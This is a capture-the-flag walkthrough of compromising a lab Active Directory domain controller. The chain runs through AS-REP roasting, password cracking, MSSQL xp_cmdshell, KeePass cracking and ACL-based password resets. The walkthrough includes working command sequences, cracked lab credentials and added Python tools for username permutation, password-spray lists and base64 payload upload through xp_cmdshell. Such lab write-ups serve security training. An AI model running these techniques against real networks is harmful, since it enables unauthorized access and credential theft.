$ nmap -p- --min-rate 5000 -Pn 10.129.228.115
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-20 23:06 +08
Nmap scan report for 10.129.228.115
Host is up (0.012s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
9389/tcp open adws
49667/tcp open unknown
49677/tcp open unknown
49678/tcp open unknown
49695/tcp open unknown
49706/tcp open unknown
FTP -> AS-REP Roast
Whenever there's an FTP port open, we can check for anonymous access, and it works for this machine:
$ ftp 10.129.228.115
Connected to 10.129.228.115.
220 Microsoft FTP Service
Name (10.129.228.115:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49775|)
125 Data connection already open; Transfer starting.
02-19-21 03:06PM 103106 10.1.1.414.6453.pdf
02-19-21 03:06PM 656029 28475-linux-stack-based-buffer-overflows.pdf
02-19-21 12:55PM 1802642 BHUSA09-McDonald-WindowsHeap-PAPER.pdf
02-19-21 03:06PM 1018160 ExploitingSoftware-Ch07.pdf
08-08-20 01:18PM 219091 notes1.pdf
08-08-20 01:34PM 279445 notes2.pdf
08-08-20 01:41PM 105 README.txt
02-19-21 03:06PM 1301120 RHUL-MA-2009-06.pdf
There are several PDFs in this folder. I downloaded the README.txt file first.
$ cat README.txt
VERY IMPORTANT!!
Don't forget to change the download mode to binary so that the files are not corrupted.
Alright, we can switch to binary mode and then download all of these files to our machine:
ftp> binary
200 Type set to I.
ftp> prompt off
Interactive mode off.
ftp> mget *
I viewed all the PDFs, which didn't include anything useful. Next, we can use exiftool to view the metadata of each file, in case it reveals something like a vulnerable PDF reader version. Some of them contained a Creator (author) field, which gives us usernames:
======== notes2.pdf
ExifTool Version Number : 12.57
File Name : notes2.pdf
Directory : .
File Size : 279 kB
File Modification Date/Time : 2020:08:08 19:34:25+08:00
File Access Date/Time : 2023:06:20 23:09:05+08:00
File Inode Change Date/Time : 2023:06:20 23:09:05+08:00
File Permissions : -rw-r--r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.5
Linearized : No
Page Count : 5
XMP Toolkit : Image::ExifTool 12.03
Creator : Kaorz
Publisher : LicorDeBellota.htb
Producer : cairo 1.10.2 (http://cairographics.org)
I put all the usernames into a single file, and also took note of the domain used in the Publisher field (LicorDeBellota.htb). Here are all the users:
byron.gronseth
bryon_gronseth
b.gronseth
bryon_g
bryon.g
bryon
gronseth
saif
Kaorz
alex
The first username might need some permutation, so I included a few combinations in my username list. Since we now have a username list, we can run impacket-GetNPUsers against it with -no-pass to request AS-REP tickets for any accounts that have Kerberos pre-authentication disabled:
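As an added example (this is not code from the original writeup), here is a small generator for the kind of username list used above. It takes names harvested from document metadata, expands any "First Last" name into the common AD username formats, de-duplicates the result and writes it to users.txt, then prints the impacket-GetNPUsers invocation to feed it to. The input names are constructed for illustration and the set of formats is my own choice; the GetNPUsers syntax is impacket's real CLI.

```python
# Added example, not part of the original writeup: build an AS-REP roasting
# username list from names recovered from PDF metadata.
import re

# Constructed input: names of the kind seen in the PDF "Creator" fields above.
HARVESTED = ["Byron Gronseth", "saif", "Kaorz", "alex"]


def permute(fullname: str) -> list[str]:
    """Return common AD username formats for a name like 'First Last'.
    Single-token names (e.g. 'Kaorz') are returned unchanged."""
    parts = [p for p in re.split(r"[\s._-]+", fullname.strip()) if p]
    if len(parts) < 2:
        return [parts[0]] if parts else []
    first, last = parts[0].lower(), parts[-1].lower()
    fi, li = first[0], last[0]
    cands = [
        f"{first}.{last}", f"{first}_{last}", f"{first}{last}",   # byron.gronseth
        f"{fi}.{last}", f"{fi}{last}",                            # b.gronseth
        f"{first}.{li}", f"{first}_{li}", f"{first}{li}",         # byron.g
        f"{last}.{first}", f"{last}{fi}",                         # gronseth.byron
        first, last,
    ]
    seen, out = set(), []
    for c in cands:                      # de-duplicate, keep order
        if c not in seen:
            seen.add(c)
            out.append(c)
    return out


def build_userlist(names: list[str]) -> list[str]:
    """Flatten permutations of every harvested name into one case-insensitive
    unique list (AD usernames are case-insensitive, so 'Saif' == 'saif')."""
    seen, out = set(), []
    for n in names:
        for u in permute(n):
            if u.lower() not in seen:
                seen.add(u.lower())
                out.append(u)
    return out


if __name__ == "__main__":
    users = build_userlist(HARVESTED)
    with open("users.txt", "w") as fh:
        fh.write("\n".join(users) + "\n")
    print(f"{len(users)} candidates written to users.txt")
    # Request AS-REPs for accounts without pre-auth (impacket CLI syntax):
    print("impacket-GetNPUsers LicorDeBellota.htb/ -usersfile users.txt "
          "-no-pass -dc-ip 10.129.228.115 -format john -outputfile hashes")
```

The -format john flag makes the output directly loadable by john, as in the cracking step that follows.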
This works! The AS-REP hash for Kaorz can be cracked easily with john:
$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Roper4155 ($krb5asrep$23$Kaorz@LICORDEBELLOTA.HTB)
1g 0:00:00:07 DONE (2023-06-20 23:16) 0.1426g/s 1522Kp/s 1522Kc/s 1522KC/s Roryarthur..Ronald8
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
We now have credentials!
SMB + Bloodhound
I tried to view the shares, but we don't have access to anything special:
$ smbmap -u kaorz -p Roper4155 -H 10.129.228.115
[+] IP: 10.129.228.115:445 Name: LicorDeBellota.htb
Disk        Permissions   Comment
----        -----------   -------
ADMIN$      NO ACCESS     Remote Admin
C$          NO ACCESS     Default share
IPC$        READ ONLY     Remote IPC
NETLOGON    READ ONLY     Logon server share
SYSVOL      READ ONLY     Logon server share
We can take a look at the readable shares anyway. The NETLOGON share contained a HelpDesk folder:
$ smbclient -U 'Kaorz' //10.129.228.115/NETLOGON
Password for [WORKGROUP\Kaorz]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Aug 8 18:42:28 2020
.. D 0 Sat Aug 8 18:42:28 2020
HelpDesk D 0 Sun Aug 9 23:40:36 2020
5158399 blocks of size 4096. 1105115 blocks available
smb: \HelpDesk\> ls
. D 0 Sun Aug 9 23:40:36 2020
.. D 0 Sun Aug 9 23:40:36 2020
Restart-OracleService.exe A 1854976 Fri Feb 19 18:52:01 2021
Server MSSQL.msg A 24576 Sun Aug 9 19:04:14 2020
WinRM Service.msg A 26112 Sun Aug 9 19:42:20 2020
5158399 blocks of size 4096. 1105110 blocks available
Then, we can take a look at these files:
$ file Restart-OracleService.exe
Restart-OracleService.exe: PE32+ executable (console) x86-64, for MS Windows
$ file Server\ MSSQL.msg
Server MSSQL.msg: CDFV2 Microsoft Outlook Message
$ file WinRM\ Service.msg
WinRM Service.msg: CDFV2 Microsoft Outlook Message
I transferred this to my Windows VM for some reverse engineering.
I also used bloodhound-python to collect information about the domain for me. The first time I ran it, it generated this error:
WARNING: DCE/RPC connection failed: [Errno Connection error (pivotapi.licordebellota.htb:88)] [Errno -2] Name or service not known
INFO: Done in 00M 02
So we have to add the DC's hostname, pivotapi.licordebellota.htb, to our /etc/hosts file to enumerate properly. Then we can run the command again:
$ bloodhound-python -d LicorDeBellota.htb -u Kaorz -p Roper4155 -c all -ns 10.129.228.115
INFO: Found AD domain: licordebellota.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: pivotapi.licordebellota.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: pivotapi.licordebellota.htb
INFO: Found 28 users
INFO: Found 58 groups
INFO: Found 3 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: PivotAPI.LicorDeBellota.htb
INFO: Done in 00M 02S
Afterwards, start neo4j and BloodHound. Group and description names on this box are in Spanish, so keep that in mind when reading the graph. However, the graph showed nothing of interest for our current user, who has no special privileges. Looking at all domain users, we find a svc_mssql account:
The nmap scan earlier shows that port 1433 is indeed open. Checking this user's group memberships shows that it is part of the WinRM group, which in turn is part of the Remote Administration group (I think).
The next step is rather clear: we need to reverse engineer that .exe file somehow to gain a shell as the svc_mssql user.
Reverse Engineering
I transferred this over to my Windows VM. Oddly, running it seems to do nothing:
I took a look at the logs created by Sysmon and found some odd commands being executed. First, the binary creates a .bat file:
Afterwards, it uses that file to do something else:
It also seems that the binary deletes this file after running. To catch it, we have to run a PowerShell loop that keeps polling for the directories and the .bat file to be created, then reads the file's contents.
It was rather difficult to catch this .bat file for some reason, and it took me a lot of runs before I managed to. I used a simple PowerShell loop that reads the file:
Since we now have the .bat file, we can simply execute it ourselves after using set to change our username temporarily. We can also remove the del commands so the files are preserved:
set username=cybervaca
.\<name>.bat
This creates the files we want (after a few minutes). Afterwards, we get a monta.ps1 and a restart-service.exe file on our machine. Defender also detects this, so make sure to add the needed exclusions.
-a---- 6/20/2023 11:59 PM 1746599 B811.bat
-a---- 6/21/2023 12:05 AM 273 monta.ps1
-a---- 6/21/2023 12:05 AM 1202440 oracle.txt
-a---- 6/21/2023 12:06 AM 864768 restart-service.exe
Afterwards, we can reverse engineer the restart-service.exe file. Running it just produces this ASCII art:
It doesn't generate any logs of interest in Sysmon, so we have to dig deeper into what the process does. In this case, I used API Monitor. When I ran the binary within API Monitor, it generated a lot of calls, so I disabled the filter to view everything:
I tried searching for 'Password' and found it here!
MS-SQL Access -> PrintSpoofer Fail
Now that we have creds for svc_oracle, let's try to access the database as it. However, it appears that this svc_oracle user is not present anywhere within the domain users, and only svc_mssql is.
The password contained both 'oracle' and '2010'. I was stuck here for a long time and looked at a guide. It turns out we just need to change the password to have 'mssql' instead of 'oracle' and '2020' instead of '2010' (which I felt was an unnecessary step for this machine at this point).
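The mutation above (swap the service name, bump the year) is a general pattern: a recovered password for one service account often differs from the live one only in the tokens that were "rotated". As an added example that is not from the original writeup, the script below derives a small spray list from a recovered password by substituting service names and a range of years, so you can spray a few dozen candidates instead of guessing. The SAMPLE password and the substitution tables are my own constructed values, not the ones from the box.

```python
# Added example, not part of the original writeup: derive a spray list from a
# recovered password by swapping the tokens likely to have been rotated.
import re

SAMPLE = "#oracle_svc!2010"        # constructed; stands in for the recovered value

# Constructed substitution table: tokens seen in the old password -> likely replacements.
SERVICE_SWAPS = {"oracle": ["mssql", "sql", "sqlserver"]}
YEAR_PATTERN = re.compile(r"(19|20)\d{2}")


def case_like(template: str, word: str) -> str:
    """Mimic the casing of the matched token: oracle -> mssql, Oracle -> Mssql, ORACLE -> MSSQL."""
    if template.isupper():
        return word.upper()
    if template[:1].isupper():
        return word.capitalize()
    return word


def mutate(password: str, years_ahead: int = 12) -> list[str]:
    """Return the original password first, followed by every combination of
    service-name swap and year bump (original year .. original + years_ahead)."""
    service_opts = [password]                      # always keep the original spelling
    lowered = password.lower()
    for token, subs in SERVICE_SWAPS.items():
        idx = lowered.find(token)
        if idx == -1:
            continue
        original = password[idx:idx + len(token)]
        for s in subs:
            service_opts.append(password[:idx] + case_like(original, s) + password[idx + len(token):])

    out = []
    for base in service_opts:
        m = YEAR_PATTERN.search(base)
        if not m:                                  # no year token: nothing to bump
            out.append(base)
            continue
        y0 = int(m.group(0))
        for y in range(y0, y0 + years_ahead + 1):
            out.append(base[:m.start()] + str(y) + base[m.end():])

    seen, uniq = set(), []
    for p in out:                                  # de-duplicate, keep order
        if p not in seen:
            seen.add(p)
            uniq.append(p)
    return uniq


if __name__ == "__main__":
    cands = mutate(SAMPLE)
    with open("candidates.txt", "w") as fh:
        fh.write("\n".join(cands) + "\n")
    print(f"{len(cands)} candidates written to candidates.txt")
    # Spray against the local sa account, e.g. with CrackMapExec:
    #   crackmapexec mssql 10.129.228.115 -u sa -p candidates.txt --local-auth
```

Keep the list short: a few dozen attempts against a single SQL login is noisy but tolerable, whereas a full wordlist against sa is not.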
Anyways, we can then access the database as the sa user.
Next, we can check whether we have xp_cmdshell access.
We do! I looked around the file system to find some interesting stuff. First, I checked the users:
I cannot access any of these files as the current user, which is quite annoying. The next thing to check is our privileges, since we are, in fact, running as a service account. That means SeImpersonatePrivilege may well be enabled, and it is:
Privilege Name                Description                                       State
============================= ================================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token                     Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process                Disabled
SeMachineAccountPrivilege     Add workstations to domain                        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                          Enabled
SeManageVolumePrivilege       Perform volume maintenance tasks                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication         Enabled
SeCreateGlobalPrivilege       Create global objects                             Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set                    Disabled
Because this is enabled, we can use PrintSpoofer.exe to execute commands as SYSTEM. The problem is that I am not able to transfer the binary to the machine, since it complains that there's no route to my host. So, we have to upload it as base64-encoded strings instead.
When googling for MSSQL Shells with upload capabilities, I came across this:
This shell works after changing the credentials:
Now, we can upload PrintSpoofer.exe to the machine.
However, this just doesn't work for some reason. I think the author must've patched the usage of PrintSpoofer, because in theory it would lead to an automatic root shell.
Port Forward -> WinRM Fail
I noted that it was not possible for me to connect back to my host, probably due to firewall rules blocking inbound WinRM connections. We can read the rules using Get-NetFirewallRule. Again, it's all in Spanish.
Name : {647E1258-90D4-47EE-B28A-82DE515A1326}
DisplayName : Deny WinRM
Description :
DisplayGroup :
Group :
Enabled : True
Profile : Any
Platform : {}
Direction : Inbound
Action : Block
EdgeTraversalPolicy : Block
LooseSourceMapping : False
LocalOnlyMapping : False
Owner :
PrimaryStatus : OK
Status : The rule was parsed successfully from the store. (65536)
EnforcementStatus : NotApplicable
PolicyStoreSource : PersistentStore
PolicyStoreSourceType : Local
In this case, we have to proxy our traffic through the MSSQL instance somehow. Googling for MSSQL proxy leads me to this project:
We can download the compiled DLLs and the modified mssqlclient.py onto our Kali machine. Then we can use our UPLOAD shell to upload the reciclador.dll file:
Then we can install the assembly.dll file (which has been renamed):
Then we can run the same command with -start -reciclador 'C:\Windows\Temp\reciclador.dll'.
This opens a listener on our port 1337, which is supposed to let us connect in via WinRM, but I kept getting this error when running it.
$ python2 mssqlclient.py 'LicorDeBellota.htb/sa:#mssql_s3rV1c3!2020@10.129.228.115' -start -reciclador 'C:\Windows\Temp\reciclador.dll'
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
mssqlproxy - Copyright 2020 BlackArrow
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: Español
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 1: Changed language setting to Español.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[*] Proxy mode: check
[*] Assembly is installed
[*] Procedure is installed
[*] reciclador is installed
[*] clr enabled
[*] Proxy mode: start
[*] Listening on port 1337...
[*] ACK from server!
[*] Bye!
The connection kept cutting out when I connected via this method, so this again, doesn't work.
Remote Powershell -> Keepass Crack
My last option was to use base64-encoded PowerShell commands to run things on the machine (at this point I was looking at a writeup). 0xdf used this in the Unintended Methods part of his writeup:
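Both the base64 upload used for PrintSpoofer earlier and the base64-encoded PowerShell used here come down to the same two tricks, so here is one added example (my own code, not 0xdf's or the original writeup's) that builds both kinds of payload for xp_cmdshell. It encodes a script the way powershell -EncodedCommand expects (base64 of UTF-16LE text, not UTF-8, which is the usual mistake), and it splits a binary into base64 chunks that are appended with echo and reassembled with certutil -decode, with an offline check that the chunks decode back to the original. The chunk size, the temp paths and the sample payload are my assumptions; certutil, xp_cmdshell and -EncodedCommand are real.

```python
# Added example, not part of the original writeup: payload builders for a
# foothold that is only xp_cmdshell with no network path back to us.
import base64


def encode_powershell(script: str) -> str:
    """powershell -EncodedCommand takes base64 of UTF-16LE, not UTF-8."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def powershell_command(script: str) -> str:
    """Full command line to run an encoded script non-interactively."""
    return ("powershell -NoProfile -ExecutionPolicy Bypass -EncodedCommand "
            + encode_powershell(script))


def upload_commands(data: bytes, remote_path: str, chunk: int = 3000) -> list[str]:
    """Return the cmd.exe commands that rebuild `data` at `remote_path`.
    Assumption: chunk=3000 keeps each command well under the nvarchar(4000)
    limit of xp_cmdshell's argument and cmd.exe's 8191-character line limit.
    The space before '>>' is deliberate: 'echo ...1>>file' would be parsed by
    cmd as a redirection of handle 1 and drop the trailing digit. certutil
    ignores the resulting trailing whitespace when decoding."""
    b64 = base64.b64encode(data).decode("ascii")
    tmp = remote_path + ".b64"
    cmds = [f"cmd /c del {tmp} 2>nul"]                # start from a clean temp file
    for i in range(0, len(b64), chunk):
        cmds.append(f"cmd /c echo {b64[i:i + chunk]} >> {tmp}")
    cmds.append(f"certutil -decode {tmp} {remote_path}")
    cmds.append(f"cmd /c del {tmp}")                  # remove the base64 residue
    return cmds


def verify_chunks(cmds: list[str], original: bytes) -> bool:
    """Offline check: join what the echo lines would write and decode it,
    the way certutil -decode will on the target (whitespace is ignored)."""
    b64 = "".join(c.split("echo ", 1)[1].split(" >> ", 1)[0]
                  for c in cmds if "echo " in c)
    return base64.b64decode(b64) == original


def as_tsql(cmd: str) -> str:
    """Wrap a command for EXEC xp_cmdshell, escaping single quotes for T-SQL."""
    return "EXEC master..xp_cmdshell '" + cmd.replace("'", "''") + "';"


if __name__ == "__main__":
    # Hypothetical script and path, to show the -EncodedCommand wrapping.
    print(as_tsql(powershell_command(r"Get-ChildItem C:\Users | Out-File C:\Windows\Temp\o.txt")))
    payload = bytes(range(256)) * 40              # constructed stand-in for a binary
    cmds = upload_commands(payload, r"C:\Windows\Temp\tool.exe")
    assert verify_chunks(cmds, payload)
    for c in cmds:
        print(as_tsql(c)[:96] + ("..." if len(c) > 96 else ""))
```

Run the printed EXEC lines one by one through the MSSQL client; if the decoded file's size does not match the local one, re-run verify_chunks locally before blaming the target.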
Afterwards, we can extract a hash from this KeePass database with keepass2john and crack it with john:
$ john --wordlist=/usr/share/wordlists/rockyou.txt kp_hash
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 60000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
mahalkita (decoded)
1g 0:00:00:00 DONE (2023-06-21 11:22) 1.470g/s 305.8p/s 305.8c/s 305.8C/s alyssa..jeremy
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Then we can access the database:
$ kpcli -kdb decoded
Provide the master password: *************************
KeePass CLI (kpcli) v3.8.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.
kpcli:/>
kpcli:/Database/Windows> show 0 -f
Title: SSH
Uname: 3v4Si0N
Pass: Gu4nCh3C4NaRi0N!23
URL:
Notes:
Then, we can finally log in as this user:
Privilege Escalation
Back to Bloodhound
Now that we have a new user to play with, we should take a look at the Bloodhound output again. Here, we find that our current user has GenericAll privileges over some other users:
Only Dr.Zaiuss has a home directory in C:\Users, so that's the next step. We also find that this user has control over superfume, who in turn is part of the Developers group:
Those are the next obvious steps.
ForceChangePassword
We can upload PowerView.ps1 via scp to the current user's directory, and then run these:
Then, we can upload PowerView.ps1 again and run the same commands, this time targeting superfume. Since superfume is not part of the SSH group either, we use evil-winrm again:
Developer RE -> Creds
Within the root of C:\, there's a Developers folder:
It appears we have another reverse engineering task. Some credentials are being passed around within this program, so we can grab the binary and transfer it back to our Windows machine to analyze it.
Since the source code is provided in C#, I opened the binary in dnSpy. There we see the complete program with the correct cipher:
We can set a breakpoint at the Console.WriteLine call, which is right after the Decrypt function. Then, in the local variables, we see this:
The array variable contains the decoded password as bytes, and we can convert it to text.
We can then grab access to the user jari.
ForceChangePassword -> Account Operators
This new user is part of a new group:
*Evil-WinRM* PS C:\Users\jari\Documents> net user jari
User name                    jari
Full Name                    Jari Laox
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never
Password last set            04/05/2021 20:11:39
Password expires             Never
Password changeable          05/05/2021 20:11:39
Password required            Yes
User may change password     Yes
Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   08/08/2020 16:21:57
Logon hours allowed          All
Local Group Memberships      *Usuarios de administr
Global Group memberships     *Usuarios del dominio
                             *Developers
                             *WinRM
Going back to BloodHound, we see that the new user jari has ForceChangePassword over two other users, one of which is more important than the other:
The gibdeon user is part of the Account Operators group (after translation). We can first reset this user's password using the same commands as the other password resets. gibdeon is not part of either the SSH or WinRM groups, so we have to use remote PowerShell script blocks to abuse this.
The Account Operators group has GenericAll over the LAPS READ group, and can also create new non-administrator accounts and modify non-protected groups in the domain (a built-in AD privilege).
Since that gives us control over essentially every non-protected group in this domain, we can just add our jari user to both LAPS READ and LAPS ADM.
LAPS Read
First, we have to build a PSCredential object in order to execute commands as gibdeon from our jari shell: